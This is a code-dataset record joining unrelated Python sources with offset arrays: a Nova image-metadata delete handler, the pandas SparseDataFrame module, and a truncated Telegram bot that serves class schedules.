@wsgi.expected_errors((403, 404))
@wsgi.response(204)
def delete(self, req, image_id, id):
context = req.environ['nova.context']
image = self._get_image(context, image_id)
if id not in image['properties']:
msg = _("Invalid metadata key")
raise exc.HTTPNotFound(explanation=msg)
image['properties'].pop(id)
try:
self.image_api.update(context, image_id, image, data=None,
purge_props=True)
except exception.ImageNotAuthorized as e:
raise exc.HTTPForbidden(explanation=e.format_message())
| [
[
[
655,
658
],
[
1355,
1358
],
[
1503,
1506
],
[
2277,
2280
],
[
3049,
3052
],
[
3535,
3538
],
[
4003,
4006
],
[
4745,
4748
],
[
5213,
5216
],
[
5487,
5490
]
],
[
[
717,
749
],
[
1578,
1610
],
[
1945,
1977
],
[
2337,
2369
],
[
3190,
3222
],
[
4125,
4157
],
[
4875,
4907
]
],
[
[
781,
787
],
[
2705,
2711
],
[
3675,
3681
],
[
4440,
4446
]
],
[
[
835,
849
],
[
2437,
2451
],
[
3290,
3304
],
[
4225,
4239
]
],
[
[
881,
885
],
[
1019,
1023
],
[
1543,
1547
],
[
1617,
1621
],
[
1910,
1914
],
[
1984,
1988
],
[
2302,
2306
],
[
2376,
2380
],
[
3155,
3159
],
[
3229,
3233
],
[
4090,
4094
],
[
4164,
4168
],
[
4840,
4844
],
[
4914,
4918
],
[
4952,
4956
]
],
[
[
907,
917
],
[
2419,
2429
],
[
3272,
3282
],
[
4207,
4217
]
],
[
[
935,
944
],
[
1302,
1311
],
[
1420,
1429
],
[
2996,
3005
],
[
3950,
3959
],
[
4692,
4701
],
[
5434,
5443
]
],
[
[
967,
968
],
[
1463,
1464
],
[
3482,
3483
],
[
5169,
5170
]
],
[
[
976,
986
],
[
1154,
1158
]
],
[
[
995,
1018
]
]
] |
"""
Data structures for sparse float data. Life is made simpler by dealing only
with float64 data
"""
from __future__ import division
# pylint: disable=E1101,E1103,W0231,E0202
import warnings
from pandas.compat import lmap
from pandas import compat
import numpy as np
from pandas.core.dtypes.missing import isna, notna
from pandas.core.dtypes.cast import maybe_upcast, find_common_type
from pandas.core.dtypes.common import ensure_platform_int, is_scipy_sparse
from pandas.compat.numpy import function as nv
from pandas.core.index import Index, MultiIndex, ensure_index
from pandas.core.series import Series
from pandas.core.frame import DataFrame, extract_index, _prep_ndarray
import pandas.core.algorithms as algos
from pandas.core.internals import (BlockManager,
create_block_manager_from_arrays)
import pandas.core.generic as generic
from pandas.core.sparse.series import SparseSeries, SparseArray
from pandas._libs.sparse import BlockIndex, get_blocks
from pandas.util._decorators import Appender
import pandas.core.ops as ops
import pandas.core.common as com
import pandas.core.indexes.base as ibase
_shared_doc_kwargs = dict(klass='SparseDataFrame')
class SparseDataFrame(DataFrame):
"""
DataFrame containing sparse floating point data in the form of SparseSeries
objects
Parameters
----------
data : same types as can be passed to DataFrame or scipy.sparse.spmatrix
.. versionchanged :: 0.23.0
If data is a dict, argument order is maintained for Python 3.6
and later.
index : array-like, optional
column : array-like, optional
default_kind : {'block', 'integer'}, default 'block'
Default sparse kind for converting Series to SparseSeries. Will not
override SparseSeries passed into constructor
default_fill_value : float
Default fill_value for converting Series to SparseSeries
(default: nan). Will not override SparseSeries passed in.
"""
_subtyp = 'sparse_frame'
def __init__(self, data=None, index=None, columns=None, default_kind=None,
default_fill_value=None, dtype=None, copy=False):
# pick up the defaults from the Sparse structures
if isinstance(data, SparseDataFrame):
if index is None:
index = data.index
if columns is None:
columns = data.columns
if default_fill_value is None:
default_fill_value = data.default_fill_value
if default_kind is None:
default_kind = data.default_kind
elif isinstance(data, (SparseSeries, SparseArray)):
if index is None:
index = data.index
if default_fill_value is None:
default_fill_value = data.fill_value
if columns is None and hasattr(data, 'name'):
columns = [data.name]
if columns is None:
raise Exception("cannot pass a series w/o a name or columns")
data = {columns[0]: data}
if default_fill_value is None:
default_fill_value = np.nan
if default_kind is None:
default_kind = 'block'
self._default_kind = default_kind
self._default_fill_value = default_fill_value
if is_scipy_sparse(data):
mgr = self._init_spmatrix(data, index, columns, dtype=dtype,
fill_value=default_fill_value)
elif isinstance(data, dict):
mgr = self._init_dict(data, index, columns, dtype=dtype)
elif isinstance(data, (np.ndarray, list)):
mgr = self._init_matrix(data, index, columns, dtype=dtype)
elif isinstance(data, SparseDataFrame):
mgr = self._init_mgr(data._data,
dict(index=index, columns=columns),
dtype=dtype, copy=copy)
elif isinstance(data, DataFrame):
mgr = self._init_dict(data, data.index, data.columns, dtype=dtype)
elif isinstance(data, Series):
mgr = self._init_dict(data.to_frame(), data.index,
columns=None, dtype=dtype)
elif isinstance(data, BlockManager):
mgr = self._init_mgr(data, axes=dict(index=index, columns=columns),
dtype=dtype, copy=copy)
elif data is None:
data = DataFrame()
if index is None:
index = Index([])
else:
index = ensure_index(index)
if columns is None:
columns = Index([])
else:
for c in columns:
data[c] = SparseArray(np.nan, index=index,
kind=self._default_kind,
fill_value=self._default_fill_value)
mgr = to_manager(data, columns, index)
if dtype is not None:
mgr = mgr.astype(dtype)
else:
msg = ('SparseDataFrame called with unknown type "{data_type}" '
'for data argument')
raise TypeError(msg.format(data_type=type(data).__name__))
generic.NDFrame.__init__(self, mgr)
@property
def _constructor(self):
return SparseDataFrame
_constructor_sliced = SparseSeries
def _init_dict(self, data, index, columns, dtype=None):
# pre-filter out columns if we passed it
if columns is not None:
columns = ensure_index(columns)
data = {k: v for k, v in compat.iteritems(data) if k in columns}
else:
keys = com._dict_keys_to_ordered_list(data)
columns = Index(keys)
if index is None:
index = extract_index(list(data.values()))
def sp_maker(x):
return SparseArray(x, kind=self._default_kind,
fill_value=self._default_fill_value,
copy=True, dtype=dtype)
sdict = {}
for k, v in compat.iteritems(data):
if isinstance(v, Series):
# Force alignment, no copy necessary
if not v.index.equals(index):
v = v.reindex(index)
if not isinstance(v, SparseSeries):
v = sp_maker(v.values)
elif isinstance(v, SparseArray):
v = v.copy()
else:
if isinstance(v, dict):
v = [v.get(i, np.nan) for i in index]
v = sp_maker(v)
sdict[k] = v
# TODO: figure out how to handle this case, all nan's?
# add in any other columns we want to have (completeness)
nan_arr = np.empty(len(index), dtype='float64')
nan_arr.fill(np.nan)
nan_arr = sp_maker(nan_arr)
sdict.update((c, nan_arr) for c in columns if c not in sdict)
return to_manager(sdict, columns, index)
def _init_matrix(self, data, index, columns, dtype=None):
""" Init self from ndarray or list of lists """
data = _prep_ndarray(data, copy=False)
index, columns = self._prep_index(data, index, columns)
data = {idx: data[:, i] for i, idx in enumerate(columns)}
return self._init_dict(data, index, columns, dtype)
def _init_spmatrix(self, data, index, columns, dtype=None,
fill_value=None):
""" Init self from scipy.sparse matrix """
index, columns = self._prep_index(data, index, columns)
data = data.tocoo()
N = len(index)
# Construct a dict of SparseSeries
sdict = {}
values = Series(data.data, index=data.row, copy=False)
for col, rowvals in values.groupby(data.col):
# get_blocks expects int32 row indices in sorted order
rowvals = rowvals.sort_index()
rows = rowvals.index.values.astype(np.int32)
blocs, blens = get_blocks(rows)
sdict[columns[col]] = SparseSeries(
rowvals.values, index=index,
fill_value=fill_value,
sparse_index=BlockIndex(N, blocs, blens))
# Add any columns that were empty and thus not grouped on above
sdict.update({column: SparseSeries(index=index,
fill_value=fill_value,
sparse_index=BlockIndex(N, [], []))
for column in columns
if column not in sdict})
return self._init_dict(sdict, index, columns, dtype)
def _prep_index(self, data, index, columns):
N, K = data.shape
if index is None:
index = ibase.default_index(N)
if columns is None:
columns = ibase.default_index(K)
if len(columns) != K:
raise ValueError('Column length mismatch: {columns} vs. {K}'
.format(columns=len(columns), K=K))
if len(index) != N:
raise ValueError('Index length mismatch: {index} vs. {N}'
.format(index=len(index), N=N))
return index, columns
def to_coo(self):
"""
Return the contents of the frame as a sparse SciPy COO matrix.
.. versionadded:: 0.20.0
Returns
-------
coo_matrix : scipy.sparse.spmatrix
If the caller is heterogeneous and contains booleans or objects,
the result will be of dtype=object. See Notes.
Notes
-----
The dtype will be the lowest-common-denominator type (implicit
upcasting); that is to say if the dtypes (even of numeric types)
are mixed, the one that accommodates all will be chosen.
e.g. If the dtypes are float16 and float32, dtype will be upcast to
float32. By numpy.find_common_type convention, mixing int64 and
and uint64 will result in a float64 dtype.
"""
try:
from scipy.sparse import coo_matrix
except ImportError:
raise ImportError('Scipy is not installed')
dtype = find_common_type(self.dtypes)
cols, rows, datas = [], [], []
for col, name in enumerate(self):
s = self[name]
row = s.sp_index.to_int_index().indices
cols.append(np.repeat(col, len(row)))
rows.append(row)
datas.append(s.sp_values.astype(dtype, copy=False))
cols = np.concatenate(cols)
rows = np.concatenate(rows)
datas = np.concatenate(datas)
return coo_matrix((datas, (rows, cols)), shape=self.shape)
def __array_wrap__(self, result):
return self._constructor(
result, index=self.index, columns=self.columns,
default_kind=self._default_kind,
default_fill_value=self._default_fill_value).__finalize__(self)
def __getstate__(self):
# pickling
return dict(_typ=self._typ, _subtyp=self._subtyp, _data=self._data,
_default_fill_value=self._default_fill_value,
_default_kind=self._default_kind)
def _unpickle_sparse_frame_compat(self, state):
""" original pickle format """
series, cols, idx, fv, kind = state
if not isinstance(cols, Index): # pragma: no cover
from pandas.io.pickle import _unpickle_array
columns = _unpickle_array(cols)
else:
columns = cols
if not isinstance(idx, Index): # pragma: no cover
from pandas.io.pickle import _unpickle_array
index = _unpickle_array(idx)
else:
index = idx
series_dict = DataFrame()
for col, (sp_index, sp_values) in compat.iteritems(series):
series_dict[col] = SparseSeries(sp_values, sparse_index=sp_index,
fill_value=fv)
self._data = to_manager(series_dict, columns, index)
self._default_fill_value = fv
self._default_kind = kind
def to_dense(self):
"""
Convert to dense DataFrame
Returns
-------
df : DataFrame
"""
data = {k: v.to_dense() for k, v in compat.iteritems(self)}
return DataFrame(data, index=self.index, columns=self.columns)
def _apply_columns(self, func):
""" get new SparseDataFrame applying func to each columns """
new_data = {}
for col, series in compat.iteritems(self):
new_data[col] = func(series)
return self._constructor(
data=new_data, index=self.index, columns=self.columns,
default_fill_value=self.default_fill_value).__finalize__(self)
def astype(self, dtype):
return self._apply_columns(lambda x: x.astype(dtype))
def copy(self, deep=True):
"""
Make a copy of this SparseDataFrame
"""
result = super(SparseDataFrame, self).copy(deep=deep)
result._default_fill_value = self._default_fill_value
result._default_kind = self._default_kind
return result
@property
def default_fill_value(self):
return self._default_fill_value
@property
def default_kind(self):
return self._default_kind
@property
def density(self):
"""
Ratio of non-sparse points to total (dense) data points
represented in the frame
"""
tot_nonsparse = sum(ser.sp_index.npoints
for _, ser in compat.iteritems(self))
tot = len(self.index) * len(self.columns)
return tot_nonsparse / float(tot)
def fillna(self, value=None, method=None, axis=0, inplace=False,
limit=None, downcast=None):
new_self = super(SparseDataFrame,
self).fillna(value=value, method=method, axis=axis,
inplace=inplace, limit=limit,
downcast=downcast)
if not inplace:
self = new_self
# set the fill value if we are filling as a scalar with nothing special
# going on
if (value is not None and value == value and method is None and
limit is None):
self._default_fill_value = value
if not inplace:
return self
# ----------------------------------------------------------------------
# Support different internal representation of SparseDataFrame
def _sanitize_column(self, key, value, **kwargs):
"""
Creates a new SparseArray from the input value.
Parameters
----------
key : object
value : scalar, Series, or array-like
kwargs : dict
Returns
-------
sanitized_column : SparseArray
"""
def sp_maker(x, index=None):
return SparseArray(x, index=index,
fill_value=self._default_fill_value,
kind=self._default_kind)
if isinstance(value, SparseSeries):
clean = value.reindex(self.index).as_sparse_array(
fill_value=self._default_fill_value, kind=self._default_kind)
elif isinstance(value, SparseArray):
if len(value) != len(self.index):
raise AssertionError('Length of values does not match '
'length of index')
clean = value
elif hasattr(value, '__iter__'):
if isinstance(value, Series):
clean = value.reindex(self.index)
if not isinstance(value, SparseSeries):
clean = sp_maker(clean)
else:
if len(value) != len(self.index):
raise AssertionError('Length of values does not match '
'length of index')
clean = sp_maker(value)
# Scalar
else:
clean = sp_maker(value, self.index)
# always return a SparseArray!
return clean
def get_value(self, index, col, takeable=False):
"""
Quickly retrieve single value at passed column and index
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
index : row label
col : column label
takeable : interpret the index/col as indexers, default False
Returns
-------
value : scalar value
"""
warnings.warn("get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._get_value(index, col, takeable=takeable)
def _get_value(self, index, col, takeable=False):
if takeable is True:
series = self._iget_item_cache(col)
else:
series = self._get_item_cache(col)
return series._get_value(index, takeable=takeable)
_get_value.__doc__ = get_value.__doc__
def set_value(self, index, col, value, takeable=False):
"""
Put single value at passed column and index
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
index : row label
col : column label
value : scalar value
takeable : interpret the index/col as indexers, default False
Notes
-----
This method *always* returns a new object. It is currently not
particularly efficient (and potentially very expensive) but is provided
for API compatibility with DataFrame
Returns
-------
frame : DataFrame
"""
warnings.warn("set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._set_value(index, col, value, takeable=takeable)
def _set_value(self, index, col, value, takeable=False):
dense = self.to_dense()._set_value(
index, col, value, takeable=takeable)
return dense.to_sparse(kind=self._default_kind,
fill_value=self._default_fill_value)
_set_value.__doc__ = set_value.__doc__
def _slice(self, slobj, axis=0, kind=None):
if axis == 0:
new_index = self.index[slobj]
new_columns = self.columns
else:
new_index = self.index
new_columns = self.columns[slobj]
return self.reindex(index=new_index, columns=new_columns)
def xs(self, key, axis=0, copy=False):
"""
Returns a row (cross-section) from the SparseDataFrame as a Series
object.
Parameters
----------
key : some index contained in the index
Returns
-------
xs : Series
"""
if axis == 1:
data = self[key]
return data
i = self.index.get_loc(key)
data = self.take([i]).get_values()[0]
return Series(data, index=self.columns)
# ----------------------------------------------------------------------
# Arithmetic-related methods
def _combine_frame(self, other, func, fill_value=None, level=None):
this, other = self.align(other, join='outer', level=level, copy=False)
new_index, new_columns = this.index, this.columns
if level is not None:
raise NotImplementedError("'level' argument is not supported")
if self.empty and other.empty:
return self._constructor(index=new_index).__finalize__(self)
new_data = {}
if fill_value is not None:
# TODO: be a bit more intelligent here
for col in new_columns:
if col in this and col in other:
dleft = this[col].to_dense()
dright = other[col].to_dense()
result = dleft._binop(dright, func, fill_value=fill_value)
result = result.to_sparse(fill_value=this[col].fill_value)
new_data[col] = result
else:
for col in new_columns:
if col in this and col in other:
new_data[col] = func(this[col], other[col])
# if the fill values are the same use them? or use a valid one
new_fill_value = None
other_fill_value = getattr(other, 'default_fill_value', np.nan)
if self.default_fill_value == other_fill_value:
new_fill_value = self.default_fill_value
elif np.isnan(self.default_fill_value) and not np.isnan(
other_fill_value):
new_fill_value = other_fill_value
elif not np.isnan(self.default_fill_value) and np.isnan(
other_fill_value):
new_fill_value = self.default_fill_value
return self._constructor(data=new_data, index=new_index,
columns=new_columns,
default_fill_value=new_fill_value
).__finalize__(self)
def _combine_match_index(self, other, func, level=None):
new_data = {}
if level is not None:
raise NotImplementedError("'level' argument is not supported")
new_index = self.index.union(other.index)
this = self
if self.index is not new_index:
this = self.reindex(new_index)
if other.index is not new_index:
other = other.reindex(new_index)
for col, series in compat.iteritems(this):
new_data[col] = func(series.values, other.values)
# fill_value is a function of our operator
fill_value = None
if isna(other.fill_value) or isna(self.default_fill_value):
fill_value = np.nan
else:
fill_value = func(np.float64(self.default_fill_value),
np.float64(other.fill_value))
return self._constructor(
new_data, index=new_index, columns=self.columns,
default_fill_value=fill_value).__finalize__(self)
def _combine_match_columns(self, other, func, level=None, try_cast=True):
# patched version of DataFrame._combine_match_columns to account for
# NumPy circumventing __rsub__ with float64 types, e.g.: 3.0 - series,
# where 3.0 is numpy.float64 and series is a SparseSeries. Still
# possible for this to happen, which is bothersome
if level is not None:
raise NotImplementedError("'level' argument is not supported")
new_data = {}
union = intersection = self.columns
if not union.equals(other.index):
union = other.index.union(self.columns)
intersection = other.index.intersection(self.columns)
for col in intersection:
new_data[col] = func(self[col], float(other[col]))
return self._constructor(
new_data, index=self.index, columns=union,
default_fill_value=self.default_fill_value).__finalize__(self)
def _combine_const(self, other, func, errors='raise', try_cast=True):
return self._apply_columns(lambda x: func(x, other))
def _reindex_index(self, index, method, copy, level, fill_value=np.nan,
limit=None, takeable=False):
if level is not None:
raise TypeError('Reindex by level not supported for sparse')
if self.index.equals(index):
if copy:
return self.copy()
else:
return self
if len(self.index) == 0:
return self._constructor(
index=index, columns=self.columns).__finalize__(self)
indexer = self.index.get_indexer(index, method, limit=limit)
indexer = ensure_platform_int(indexer)
mask = indexer == -1
need_mask = mask.any()
new_series = {}
for col, series in self.iteritems():
if mask.all():
continue
values = series.values
# .take returns SparseArray
new = values.take(indexer)
if need_mask:
new = new.values
# convert integer to float if necessary. need to do a lot
# more than that, handle boolean etc also
new, fill_value = maybe_upcast(new, fill_value=fill_value)
np.putmask(new, mask, fill_value)
new_series[col] = new
return self._constructor(
new_series, index=index, columns=self.columns,
default_fill_value=self._default_fill_value).__finalize__(self)
def _reindex_columns(self, columns, method, copy, level, fill_value=None,
limit=None, takeable=False):
if level is not None:
raise TypeError('Reindex by level not supported for sparse')
if notna(fill_value):
raise NotImplementedError("'fill_value' argument is not supported")
if limit:
raise NotImplementedError("'limit' argument is not supported")
if method is not None:
raise NotImplementedError("'method' argument is not supported")
# TODO: fill value handling
sdict = {k: v for k, v in compat.iteritems(self) if k in columns}
return self._constructor(
sdict, index=self.index, columns=columns,
default_fill_value=self._default_fill_value).__finalize__(self)
def _reindex_with_indexers(self, reindexers, method=None, fill_value=None,
limit=None, copy=False, allow_dups=False):
if method is not None or limit is not None:
raise NotImplementedError("cannot reindex with a method or limit "
"with sparse")
if fill_value is None:
fill_value = np.nan
reindexers = {self._get_axis_number(a): val
for (a, val) in compat.iteritems(reindexers)}
index, row_indexer = reindexers.get(0, (None, None))
columns, col_indexer = reindexers.get(1, (None, None))
if columns is None:
columns = self.columns
new_arrays = {}
for col in columns:
if col not in self:
continue
if row_indexer is not None:
new_arrays[col] = algos.take_1d(self[col].get_values(),
row_indexer,
fill_value=fill_value)
else:
new_arrays[col] = self[col]
return self._constructor(new_arrays, index=index,
columns=columns).__finalize__(self)
def _join_compat(self, other, on=None, how='left', lsuffix='', rsuffix='',
sort=False):
if on is not None:
raise NotImplementedError("'on' keyword parameter is not yet "
"implemented")
return self._join_index(other, how, lsuffix, rsuffix)
def _join_index(self, other, how, lsuffix, rsuffix):
if isinstance(other, Series):
if other.name is None:
raise ValueError('Other Series must have a name')
other = SparseDataFrame(
{other.name: other},
default_fill_value=self._default_fill_value)
join_index = self.index.join(other.index, how=how)
this = self.reindex(join_index)
other = other.reindex(join_index)
this, other = this._maybe_rename_join(other, lsuffix, rsuffix)
from pandas import concat
return concat([this, other], axis=1, verify_integrity=True)
def _maybe_rename_join(self, other, lsuffix, rsuffix):
to_rename = self.columns.intersection(other.columns)
if len(to_rename) > 0:
if not lsuffix and not rsuffix:
raise ValueError('columns overlap but no suffix specified: '
'{to_rename}'.format(to_rename=to_rename))
def lrenamer(x):
if x in to_rename:
return '{x}{lsuffix}'.format(x=x, lsuffix=lsuffix)
return x
def rrenamer(x):
if x in to_rename:
return '{x}{rsuffix}'.format(x=x, rsuffix=rsuffix)
return x
this = self.rename(columns=lrenamer)
other = other.rename(columns=rrenamer)
else:
this = self
return this, other
def transpose(self, *args, **kwargs):
"""
Returns a DataFrame with the rows/columns switched.
"""
nv.validate_transpose(args, kwargs)
return self._constructor(
self.values.T, index=self.columns, columns=self.index,
default_fill_value=self._default_fill_value,
default_kind=self._default_kind).__finalize__(self)
T = property(transpose)
@Appender(DataFrame.count.__doc__)
def count(self, axis=0, **kwds):
if axis is None:
axis = self._stat_axis_number
return self.apply(lambda x: x.count(), axis=axis)
def cumsum(self, axis=0, *args, **kwargs):
"""
Return SparseDataFrame of cumulative sums over requested axis.
Parameters
----------
axis : {0, 1}
0 for row-wise, 1 for column-wise
Returns
-------
y : SparseDataFrame
"""
nv.validate_cumsum(args, kwargs)
if axis is None:
axis = self._stat_axis_number
return self.apply(lambda x: x.cumsum(), axis=axis)
@Appender(generic._shared_docs['isna'] % _shared_doc_kwargs)
def isna(self):
return self._apply_columns(lambda x: x.isna())
isnull = isna
@Appender(generic._shared_docs['notna'] % _shared_doc_kwargs)
def notna(self):
return self._apply_columns(lambda x: x.notna())
notnull = notna
def apply(self, func, axis=0, broadcast=None, reduce=None,
result_type=None):
"""
Analogous to DataFrame.apply, for SparseDataFrame
Parameters
----------
func : function
Function to apply to each column
axis : {0, 1, 'index', 'columns'}
broadcast : bool, default False
For aggregation functions, return object of same size with values
propagated
.. deprecated:: 0.23.0
This argument will be removed in a future version, replaced
by result_type='broadcast'.
reduce : boolean or None, default None
Try to apply reduction procedures. If the DataFrame is empty,
apply will use reduce to determine whether the result should be a
Series or a DataFrame. If reduce is None (the default), apply's
return value will be guessed by calling func an empty Series (note:
while guessing, exceptions raised by func will be ignored). If
reduce is True a Series will always be returned, and if False a
DataFrame will always be returned.
.. deprecated:: 0.23.0
This argument will be removed in a future version, replaced
by result_type='reduce'.
result_type : {'expand', 'reduce', 'broadcast, None}
These only act when axis=1 {columns}:
* 'expand' : list-like results will be turned into columns.
* 'reduce' : return a Series if possible rather than expanding
list-like results. This is the opposite to 'expand'.
* 'broadcast' : results will be broadcast to the original shape
of the frame, the original index & columns will be retained.
The default behaviour (None) depends on the return value of the
applied function: list-like results will be returned as a Series
of those. However if the apply function returns a Series these
are expanded to columns.
.. versionadded:: 0.23.0
Returns
-------
applied : Series or SparseDataFrame
"""
if not len(self.columns):
return self
axis = self._get_axis_number(axis)
if isinstance(func, np.ufunc):
new_series = {}
for k, v in compat.iteritems(self):
applied = func(v)
applied.fill_value = func(v.fill_value)
new_series[k] = applied
return self._constructor(
new_series, index=self.index, columns=self.columns,
default_fill_value=self._default_fill_value,
default_kind=self._default_kind).__finalize__(self)
from pandas.core.apply import frame_apply
op = frame_apply(self,
func=func,
axis=axis,
reduce=reduce,
broadcast=broadcast,
result_type=result_type)
return op.get_result()
def applymap(self, func):
"""
Apply a function to a DataFrame that is intended to operate
elementwise, i.e. like doing map(func, series) for each series in the
DataFrame
Parameters
----------
func : function
Python function, returns a single value from a single value
Returns
-------
applied : DataFrame
"""
return self.apply(lambda x: lmap(func, x))
def to_manager(sdf, columns, index):
""" create and return the block manager from a dataframe of series,
columns, index
"""
# from BlockManager perspective
axes = [ensure_index(columns), ensure_index(index)]
return create_block_manager_from_arrays(
[sdf[c] for c in columns], columns, axes)
def stack_sparse_frame(frame):
"""
Only makes sense when fill_value is NaN
"""
lengths = [s.sp_index.npoints for _, s in compat.iteritems(frame)]
nobs = sum(lengths)
# this is pretty fast
minor_labels = np.repeat(np.arange(len(frame.columns)), lengths)
inds_to_concat = []
vals_to_concat = []
# TODO: Figure out whether this can be reached.
# I think this currently can't be reached because you can't build a
# SparseDataFrame with a non-np.NaN fill value (fails earlier).
for _, series in compat.iteritems(frame):
if not np.isnan(series.fill_value):
raise TypeError('This routine assumes NaN fill value')
int_index = series.sp_index.to_int_index()
inds_to_concat.append(int_index.indices)
vals_to_concat.append(series.sp_values)
major_labels = np.concatenate(inds_to_concat)
stacked_values = np.concatenate(vals_to_concat)
index = MultiIndex(levels=[frame.index, frame.columns],
labels=[major_labels, minor_labels],
verify_integrity=False)
lp = DataFrame(stacked_values.reshape((nobs, 1)), index=index,
columns=['foo'])
return lp.sort_index(level=0)
def homogenize(series_dict):
"""
Conform a set of SparseSeries (with NaN fill_value) to a common SparseIndex
corresponding to the locations where they all have data
Parameters
----------
series_dict : dict or DataFrame
Notes
-----
Using the dumbest algorithm I could think of. Should put some more thought
into this
Returns
-------
homogenized : dict of SparseSeries
"""
index = None
need_reindex = False
for _, series in compat.iteritems(series_dict):
if not np.isnan(series.fill_value):
raise TypeError('this method is only valid with NaN fill values')
if index is None:
index = series.sp_index
elif not series.sp_index.equals(index):
need_reindex = True
index = index.intersect(series.sp_index)
if need_reindex:
output = {}
for name, series in compat.iteritems(series_dict):
if not series.sp_index.equals(index):
series = series.sparse_reindex(index)
output[name] = series
else:
output = series_dict
return output
# use unaccelerated ops for sparse objects
ops.add_flex_arithmetic_methods(SparseDataFrame)
ops.add_special_arithmetic_methods(SparseDataFrame)
| [
[
[
125,
133
]
],
[
[
184,
192
],
[
16610,
16618
],
[
17895,
17903
]
],
[
[
219,
223
],
[
33798,
33802
]
],
[
[
243,
249
],
[
5628,
5634
],
[
6101,
6107
],
[
11815,
11821
],
[
12296,
12302
],
[
12548,
12554
],
[
13594,
13600
],
[
21815,
21821
],
[
25547,
25553
],
[
26245,
26251
],
[
32637,
32643
],
[
34279,
34285
],
[
34686,
34692
],
[
35876,
35882
],
[
36295,
36301
]
],
[
[
257,
268
],
[
23547,
23549
],
[
3142,
3144
],
[
3628,
3630
],
[
4752,
4754
],
[
6565,
6567
],
[
6795,
6797
],
[
6854,
6856
],
[
7982,
7984
],
[
10408,
10410
],
[
10543,
10545
],
[
10579,
10581
],
[
10616,
10618
],
[
20699,
20701
],
[
20829,
20831
],
[
20871,
20873
],
[
20979,
20981
],
[
21017,
21019
],
[
22072,
22074
],
[
22123,
22125
],
[
22190,
22192
],
[
24688,
24690
],
[
26147,
26149
],
[
32574,
32576
],
[
34374,
34376
],
[
34384,
34386
],
[
34726,
34728
],
[
34991,
34993
],
[
35043,
35045
],
[
35922,
35924
]
],
[
[
309,
313
],
[
21990,
21994
],
[
22016,
22020
]
],
[
[
315,
320
],
[
25175,
25180
]
],
[
[
357,
369
],
[
24631,
24643
]
],
[
[
371,
387
],
[
10194,
10210
]
],
[
[
426,
445
],
[
24080,
24099
]
],
[
[
447,
462
],
[
3326,
3341
]
],
[
[
496,
510
],
[
28963,
28965
],
[
29772,
29774
]
],
[
[
541,
546
],
[
4517,
4522
],
[
4648,
4653
],
[
5760,
5765
],
[
11372,
11377
],
[
11574,
11579
]
],
[
[
548,
558
],
[
35086,
35096
]
],
[
[
560,
572
],
[
4569,
4581
],
[
5569,
5581
],
[
34000,
34012
],
[
34023,
34035
]
],
[
[
604,
610
],
[
4089,
4095
],
[
6154,
6160
],
[
7725,
7731
],
[
15612,
15618
],
[
19301,
19307
],
[
27426,
27432
]
],
[
[
641,
650
],
[
1220,
1229
],
[
29265,
29274
],
[
3968,
3977
],
[
4450,
4459
],
[
11761,
11770
],
[
12335,
12344
],
[
35251,
35260
]
],
[
[
652,
665
],
[
5819,
5832
]
],
[
[
667,
680
],
[
7152,
7165
]
],
[
[
688,
719
],
[
26648,
26653
]
],
[
[
755,
767
],
[
4252,
4264
]
],
[
[
804,
836
],
[
34056,
34088
]
],
[
[
845,
875
],
[
29948,
29955
],
[
30107,
30114
],
[
5255,
5262
]
],
[
[
914,
926
],
[
5392,
5404
],
[
2635,
2647
],
[
6341,
6353
],
[
8071,
8083
],
[
8330,
8342
],
[
11872,
11884
],
[
15135,
15147
],
[
15712,
15724
]
],
[
[
928,
939
],
[
2649,
2660
],
[
4740,
4751
],
[
6430,
6441
],
[
15323,
15334
],
[
5899,
5910
],
[
14954,
14965
]
],
[
[
972,
982
],
[
8198,
8208
],
[
8478,
8488
]
],
[
[
984,
994
],
[
8019,
8029
]
],
[
[
1031,
1039
],
[
29256,
29264
],
[
29939,
29947
],
[
30098,
30106
]
],
[
[
1047,
1069
],
[
36568,
36571
],
[
36617,
36620
]
],
[
[
1077,
1102
],
[
5701,
5704
]
],
[
[
1110,
1143
],
[
8776,
8781
],
[
8849,
8854
]
],
[
[
1145,
1163
],
[
29979,
29997
],
[
30139,
30157
]
],
[
[
1204,
1219
],
[
36600,
36615
],
[
36652,
36667
],
[
2260,
2275
],
[
3749,
3764
],
[
5349,
5364
],
[
13005,
13020
],
[
13848,
13863
],
[
27557,
27572
]
],
[
[
33819,
33829
],
[
4937,
4947
],
[
6984,
6994
],
[
12000,
12010
]
],
[
[
34146,
34164
]
],
[
[
35385,
35395
]
]
] |
import time
import telebot
from Responses import TELE_HI_GREET, TELE_CLASS_CODE
import BacaPdf as pdf
import csvHandler as csvH
with open('API_KEY.txt') as API_KEY:
bot = telebot.TeleBot(API_KEY.read()[:-1])
#Message type check
#ClassCode, TimeInterval, Status, Feedback
messageBool = [False, False, False, False]
def Echooo(themessage):
for ID in csvH.AllID():
bot.send_message(ID, themessage)
def Greet(message):
print(message.text)
if (message.text).lower() in TELE_HI_GREET:
return True
return False
def ClassCode(message):
if (message.text).lower() in TELE_CLASS_CODE:
return True
return False
def TimeInterval(message):
message = (message.text).lower()
if message.isdigit():
return True
return False
def feedbackCatch(message):
if messageBool[3]:
return True
return False
#Commands
@bot.message_handler(commands=['start'])
def start(message):
bot.reply_to(message,"HEY! Welcome to bot Ukrida")
if csvH.checkID(message.chat.id) == 0:
classCom(message,True)
csvH.newID(message.chat.id,
message.chat.first_name,
message.chat.username,
"1PEEA", 10, 'active')
@bot.message_handler(commands=['classcode'])
def classCom(message, first = False):
global messageBool
messageBool = [True, False, False, False]
if first:
bot.send_message(message.chat.id, "Ketik kode kelasmu,\n(Contoh 1Peea):")
else:
bot.send_message(message.chat.id, "Ketik kode kelasmu, atau /cancel untuk membatalkan\n(Contoh 1Peea):")
@bot.message_handler(commands=['cancel'])
def cancelCom(message):
global messageBool
for x in messageBool:
if x:
messageBool = [False, False, False, False]
bot.send_message(message.chat.id, "OK :)")
return
@bot.message_handler(commands=['feedback'])
def feedbackCom(message):
global messageBool
messageBool = [False, False, False, True]
bot.send_message(message.chat.id, "Feedback, atau laporan error:")
@bot.message_handler(commands=['schedules'])
def schedulesCom(message,classCode=0):
if classCode == 0:
classCode = csvH.checkClass(message.chat.id)
queryClass = pdf.openFile(classCode)
if len(queryClass) > 0:
for kelas in queryClass:
sendTo = "Matkul: "+kelas[0]+"\n"
